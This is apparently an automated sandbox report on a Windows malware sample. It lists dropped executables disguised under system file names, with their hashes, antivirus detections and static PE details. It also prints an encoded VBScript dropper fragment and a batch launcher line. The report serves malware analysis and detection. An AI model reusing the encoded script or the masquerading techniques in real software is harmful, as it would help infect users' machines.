SSDEEP:	24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
MD5:	7115A3215A4C22EF20AB9AF4160EE8F5
SHA1:	A4CAB34355971C1FBAABECEFA91458C4936F2C24
SHA-256:	A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
SHA-512:	2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chainsavesref.exe.log

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1740
Entropy (8bit):	5.360872475306136
Encrypted:	false
SSDEEP:	48:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1hAHKKP5H+RHKl:iqnwmI0qerYqGgAoPtzG1eqKP5gql
MD5:	7AC9E3ED5E1926DAE60D44553AFE67FE
SHA1:	1EC2BB13633A3C21E2F3206696D89876B15E160F
SHA-256:	97BCE2B4536F07A3269FCCA71C9768C9D516D065BE0E538B17BADB90C32A6554
SHA-512:	D8070849646B1E8967C713800098073E68B0FF5EAB55E06A32E0C365A6D49E5FB1718340459B4710B4A8DC6CDE8EA1345F7935CD0C7E27A18BEF71B8309A5B27
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

Download File

Process:	C:\Recovery\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.367899416177239
Encrypted:	false
SSDEEP:	24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
MD5:	7115A3215A4C22EF20AB9AF4160EE8F5
SHA1:	A4CAB34355971C1FBAABECEFA91458C4936F2C24
SHA-256:	A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
SHA-512:	2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Windows\Help\mui\0409\5f7cc7e87d7637

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	154
Entropy (8bit):	5.614624794634796
Encrypted:	false
SSDEEP:	3:cBc8BBt/giiYhRD7GRLCnkSjsVWxyAUjI312vAGcCpYr2xiUdqJdn:cBjN3HD7GRSkQ1sjI2KixiEMdn
MD5:	D25ABFBDB53986A76D2E91619515E94B
SHA1:	059306BB7234709E1B826B215F24C5561ED6A9EA
SHA-256:	35FB906845BCF87A2421D62B7E27AEF8763BB4DEE99BD481D7181D5197A38275
SHA-512:	B88DF941C731D7893068FE326596E57C0EF9C0ED02291E2B04234757E73EA8C259B87A7069453E0FF8A900AAA87543E6D83D353CA52E3CC92C904E48C9F9927B
Malicious:	false
Preview:	5lCSyb9W0OFdHZOGiV173GdgDkedz4MAPmagmXmXCjAv97hqcvw6pgPzIgON7fh6CFNe8rdLsd4UFrgFDxBEIQVsXlYGIYahCEt4tCsvRlNLm4ta9JKJecyvteGXSXCTDXSA8mVAFQwgDJGc18G8ORCjQ8

C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848384
Entropy (8bit):	6.083714696898079
Encrypted:	false
SSDEEP:	12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
MD5:	4EAF964B744BD6801B5122AE1AFBBDE4
SHA1:	6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
SHA-256:	B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
SHA-512:	DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 55%, Browse Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Web\Screen\5f7cc7e87d7637

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	773
Entropy (8bit):	5.88188550946202
Encrypted:	false
SSDEEP:	24:2H1Kni1gTAx6cexSqZrFMp4xP6kokJMjdrcf:QKmgDZk4xPZoAMjpcf
MD5:	44C69EB09C48C916E503CE08DF5C4A0A
SHA1:	5B8EA8066FB5DBD65076B0CDF2E53281EA05AE1A
SHA-256:	AF9F089D501BED940AE6ED794E165E76B2E077020A4A9516528131537C52050C
SHA-512:	D29B7F2723A43AAA7519CFBEA3D1946C01932BAC755819A2B5EA779DD20312BF1294956E0995F185EA0FA6AB47B914DF485E4BA0839B459584288EA6338AB061
Malicious:	false
Preview:	pvJqWeLx3GiWPAI9G138TsFZywcpqI7l9lWfjDW4TFxRN6IHk7iGnTc7qu1kBfHuI7WoomaCe8oN4xL2oVFtk18qJYyzMw3x8CIQjec7hflooOC2j95qaXKR9qfPyl0sF1P1p4TK3ILEPTB5W6PN1MXk21Q28MJ5p3jx9KNopvwRMFBqpk31Vm02eo9xoaLq9PYWtO5LtlhFZFYx0kNYTRkCCrTVLZAPkGS6qp6borIuFvcYPM7EMwXrpVTC4kATkRfTwcGKnwulI07RO4F9c6DxtkQVW4gDrzJxPJlwFwaZCwizYBy9fB0oOskLLuytQq3TqJBFTS3qfnu7Cb6UFgiq8ejhiZlV7rIV2PIOAsqMIKJk7nJuyenuINULkeg3risyeZEwSrUXzWiyV8k5P0gdDYNo57ofMwejbUGhiXbGJQ4wpfzm3kn1BOuGMa1VDyLD18WA2CX2YaTxea9ZHCmlIniMkAVIfGDVF14rIyt1Nvck56lvacNAMj4OZKa1rPWRX8sngSQTSuXXL7RnYkrD3CJf6qR8Y1K7YKN6O8OIL4rbMgDb2wdGiSYUzNq0AR4akZ8AuUZaVi29VrSamzGlYDZGw3HARYH39R0wiCrhWCv9aY9H4QNLLSCh92N0NZI6b8AD1g1jHiPVRapY39FBK6rqPTwpy0T73yibY5QXYnDmDqPjMz6NTHveQUyhuMuQPScd2NA8tsnh3FmjDNd94GnwCDLDGsnM2wXvOwq9z8eleOlLrPehtvWIopazC61AF

C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848384
Entropy (8bit):	6.083714696898079
Encrypted:	false
SSDEEP:	12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
MD5:	4EAF964B744BD6801B5122AE1AFBBDE4
SHA1:	6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
SHA-256:	B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
SHA-512:	DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\comproviderRuntimecommon\9e8d7a4ca61bd9

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	402
Entropy (8bit):	5.875646102875155
Encrypted:	false
SSDEEP:	6:hwXJCT93EfPWpqBWxg6wGyxNCigxRnwo75OcbOLwFvxD+PXRKDHYZQEW2HMn:ICyMqwGNChRn3NqLG5q/RcHkgn
MD5:	7734AF8B276980372DA8BE8AA89AB8B3
SHA1:	6D1681C0B7B62DABAAE9EBD46295204DD8400E91
SHA-256:	CCA27072E563DDBF09DBAB445473049555FA54BFD69A9007ECA4F2A5E35C22E2
SHA-512:	4EF5E0F8CA8A5EF77B3CC6D23A9B6D2D5A58DD00ADEAD06AE5D14BA41ECD3BF5863E22C06C58C5E199D8927B7AA472AF3FAE84673681BF63125491957F90D6D3
Malicious:	false
Preview:	5iXxRGQqVqBQ2z7Z1c9zk0EikaRNRO7yKnv4SXaXBmNAPCvpFEQlLwxFeyN0zDZGtNGPEDGeCly8mDThpmHM7WnX0pZdKji8NGQC6flB7wij8zdafpLM5MJWksYYnmUcC0ugwRlJBFPLxDZAM98eXWCA64bNHMXUcFgIE6nOECL078jhTYLoozFqytj2zYCys4srgQ5PWtaVKMD8V43sAtqmAzTUXuYqAWHCP1BCc6R4Yufmqkh4eTx8OFrq7k1lUuUyEAsd30QEbvOQUrowNeLriJyJKUF1EqkoZrip1DBnCtgc1aWP6FY0inQ4LjTivYAvLj0mJ94JchozmWRt8059RtFwbndSuc2nsuRSktF7KOYB9aRzRjj4dBdbeELgfmZ9pAG1E9IPu8yDVE

C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat

Download File

Process:	C:\Users\user\Desktop\cDouNOFXle.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.266730872678045
Encrypted:	false
SSDEEP:	3:I5gTlMkjLYjWJ:Iwlp3Yje
MD5:	665BDA14C5E0F28A4FCAAB8726DC6EBE
SHA1:	16DEB93757751E2D66E05C2C22505DB113FA96BA
SHA-256:	09C3E02A4CAAD39E7C91F0BA1CC93C8C727D23B306DA9129CCA1D0955880C33E
SHA-512:	51E85507A8C515FB3FE854A5D969C83D4C6ADD05284A11232B773EEBD19BA2B148B01CE116D65D6BF7CDFC13064ABFF8F0E69825630446E00B7846EB16ED8CB5
Malicious:	false
Preview:	"C:\comproviderRuntimecommon\chainsavesref.exe"

C:\comproviderRuntimecommon\RuntimeBroker.exe

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848384
Entropy (8bit):	6.083714696898079
Encrypted:	false
SSDEEP:	12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
MD5:	4EAF964B744BD6801B5122AE1AFBBDE4
SHA1:	6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
SHA-256:	B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
SHA-512:	DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\comproviderRuntimecommon\backgroundTaskHost.exe

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848384
Entropy (8bit):	6.083714696898079
Encrypted:	false
SSDEEP:	12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
MD5:	4EAF964B744BD6801B5122AE1AFBBDE4
SHA1:	6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
SHA-256:	B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
SHA-512:	DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\comproviderRuntimecommon\chainsavesref.exe

Download File

Process:	C:\Users\user\Desktop\cDouNOFXle.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	848384
Entropy (8bit):	6.083714696898079
Encrypted:	false
SSDEEP:	12288:584s165YnPKDGWcvOarVwvZDyg7VGNtImleJ:C1IDGWcmarVKFPJ
MD5:	4EAF964B744BD6801B5122AE1AFBBDE4
SHA1:	6E459FB6F3C6B7094D8D5AF10BC30C87AEE03981
SHA-256:	B570E2028088759D02EA13F7646BF7ACA78865D55F7FD8E2EFAEEC45C670E9FF
SHA-512:	DC3E15AB58996C71E8999DD5521961F2BD08529F685465BCA5B11319EF0B4DC009F2528097ADCE0DCA44FC675BA04156F9846F986F07A3E8CED366D5ABBD2D4A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 70%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......~.... ........@.. .......................`............@.................................0...K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\comproviderRuntimecommon\eddb19405b7ce1

Download File

Process:	C:\comproviderRuntimecommon\chainsavesref.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	965
Entropy (8bit):	5.895969511903032
Encrypted:	false
SSDEEP:	24:zMVH2Kc2dETTXdla3efM2QfnZ6qHy8ikD5Fk6KlRw34Y5:zYo2CXdieb+Z6qHy8hND
MD5:	B052857C9DE3DD65305100232C55ECF0
SHA1:	5789A2644F17F918F162833FE4977F7139A5C132
SHA-256:	A3BC14FFE5D7BD3FD68E643E3CC08A101E06659B2E2B30AA57D65C44CE156D90
SHA-512:	2DA5D25FCB1B0D7AEE2275B7E4336DE8D9DE80B3C0999D6C6752DB114CF3ED9E46826F4608A90D8FEA6A058D9DA4CCAB8F4DC1D4CA594CE30A52092C2DA28599
Malicious:	false
Preview:	KrR0xghjbizYV9UavRaUJfMaGaRLL1kOHrzZkOMmrLgQO7sxq52ttixpf0tXOWYk7kRoJ4zhFym885MJrefP81ej3K4tezYVx5TnqEnvFVo55zqjokpt0ImGFru8AFCQZRLDmidn0uKmMinEeVF3KoepTMh8Upu9TYgnom6FHB3G793hDqepAIFuwfuZBeTL9KTyCAZ1Y9wIvYrTTA4nKF8KSv1I2gEmsrHxpEeDQnQAW79YyaGAkpB3LJgQJR815JaDQ4oOf0Xhy7yUwcTbaDBCqNlgiN49oYFMh5H4w2fuSdENVLeq7hb2HXWCSHpS6Y2Z2lx0VYphiRuMIXLXsOBH6NEJiEloMMy3lpVtXoVj13U0nK456RjsWvcphoRQwAVVd0ldBbAE2cPC3OgYKqs4nGgzMqLtWEw0i8Wwia4eRez4fawTH3FGSasXTwRVQRsxqYe41t0uwNnIQmTw32lc9piIP8cwIiO9wBOH51bXCVUFwkHrcfbYpPyA0Wo3QEmN8nWPXM0CaOanVcVp1vTmG0UgMNQjNiG8tGGIO2TQpZ7bzKpXA8Bfu9HITzCJ5Qy2Hb4OWMb9cC7q32qCi3jOglOt98yYzJVYkEUYQbBxhCCsCaObIAlCrkWgMLOXYDJTriFyiSwH2vqdigqjtXPziTrAsyLEMnZe2tAeUa20OdJ5427qepoAxTvX1FGuGr5OWMlyfMOTeYlEJvGz0fkg8Yqi8mmOTIugi4jrRILRbVfYsqOG9R3kGYQ7fC02k99VoEfOLYisUTEn3R0RYgOCPJaJolMPSSrbVJunLA4ltLQxTmENLieDv7GeoVjkMSaBlnStgNGYmnTE3mzCh8EtxnqXDQ8zaUZauOLqTVq7cGaIoClCghCNOqO775pQPQ7SN2TobJsMRGRrNhtAp6T3RLLEANsYparLII4vt6lWy06HZguZMplT6EACqPoNaUg1Z

C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe

Download File

Process:	C:\Users\user\Desktop\cDouNOFXle.exe
File Type:	data
Category:	dropped
Size (bytes):	221
Entropy (8bit):	5.869799958312498
Encrypted:	false
SSDEEP:	6:G5kgwqK+NkLzWbHa/818nZNDd3RL1wQJRrbXb79x5BD9ZpWS1:G6BMCzWLaG4d3XBJhfbb1
MD5:	57F4CBF8C281ACDE2C48327DFB2B3C45
SHA1:	F752FF26E32BED28F91712E5322D438ADAE0D6F4
SHA-256:	0864BAA556ADDDC451E8AD0ACBDFBAF692A7371A5CBB8EF2B2B83AA05C56FB39
SHA-512:	CF9EF8920DF9E3BD5CB9F907616C48BF0267DF974987774495F84D49999E54A626F96B8221DDA23ABBED5E753C1F53725FFE896A43B0CBA41EE0EACDC1F6BDDB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^xAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJmGswMW\bN..I!xOks+^Gs:W.&fdSk"X1Mt:d&X uu(oWmc8lDJS~Z~PWC^/nvT4AAA==^#~@.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.441074143240984
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	cDouNOFXle.exe
File size:	1232540
MD5:	54172888b473f2515b13fe1e2032a112
SHA1:	fc4ff4d53a1ea6cfee9265840bfc1dda0ee8c1e6
SHA256:	05379ea4600304f51cffa8d1ee9e3b2931a69129f6bed14d45a500d966a71fca
SHA512:	d09ce140712a46f3f94eaaf0c567ca30ce6de8b81ed8b45961cf6f4211225b43e6944dba769c212e11f836cf579932883a28d798353af9d6bd71c40e8a8f90a5
SSDEEP:	12288:WRZ+IoG/n9IQxW3OBseWyx/bl84s165YnPKDGWcvOarVwvZDyg7VGNtImleJS:Q2G/nvxW3Ww4DW1IDGWcmarVKFPJS
TLSH:	AE454B017E44CE52F0181633C2FF45988BB4A9503AA6E31B7EB9377D65223967C0DADB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

File Icon


Icon Hash:	fbb99bdaecbcdce8

Static PE Info

General

Entrypoint:	0x41ec40
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcf1390e9ce472c7270447fc5c61a0c1

Entrypoint Preview

Instruction
call 00007FFA04AE8CB9h
jmp 00007FFA04AE86CDh
cmp ecx, dword ptr [0043E668h]
jne 00007FFA04AE8845h
ret
jmp 00007FFA04AE8E3Eh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FFA04ADB5D7h
mov dword ptr [esi], 00435580h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00435588h
mov dword ptr [ecx], 00435580h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 00435568h
push eax
call 00007FFA04AEB9DDh
pop ecx
ret
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FFA04ADB56Eh
push 0043B704h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FFA04AEB0F2h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FFA04AE87E4h
push 0043B91Ch
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FFA04AEB0D5h
int3
jmp 00007FFA04AED123h
jmp dword ptr [00433260h]
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00421EB0h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2015 UPD3.1 build 24215
[EXP] VS2015 UPD3.1 build 24215
[RES] VS2015 UPD3 build 24213
[LNK] VS2015 UPD3.1 build 24215

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3c820	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3c854	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x63000	0x1e494	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x82000	0x2268	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3aac0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x35508	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3bdc4	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x310ea	0x31200	False	0.583959526081425	data	6.708075396341128	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xa612	0xa800	False	0.45284598214285715	data	5.221742709250668	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x23728	0x1000	False	0.36767578125	data	3.7088186669877685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x62000	0x188	0x200	False	0.4453125	data	3.2982538067961342	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x63000	0x1e494	0x1e600	False	0.2540991512345679	data	6.688895303072544	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x82000	0x2268	0x2400	False	0.7681206597222222	data	6.5548620101740545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
PNG	0x63614	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States
PNG	0x6415c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States
RT_ICON	0x65708	0x1514	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x66c1c	0x10828	data
RT_ICON	0x77444	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4284900196, next used block 4284900196
RT_ICON	0x7b66c	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4283782754, next used block 4285426547
RT_ICON	0x7dc14	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4286412417, next used block 4285688944
RT_ICON	0x7ecbc	0x468	GLS_BINARY_LSB_FIRST
RT_DIALOG	0x7f124	0x286	data	English	United States
RT_DIALOG	0x7f3ac	0x13a	data	English	United States
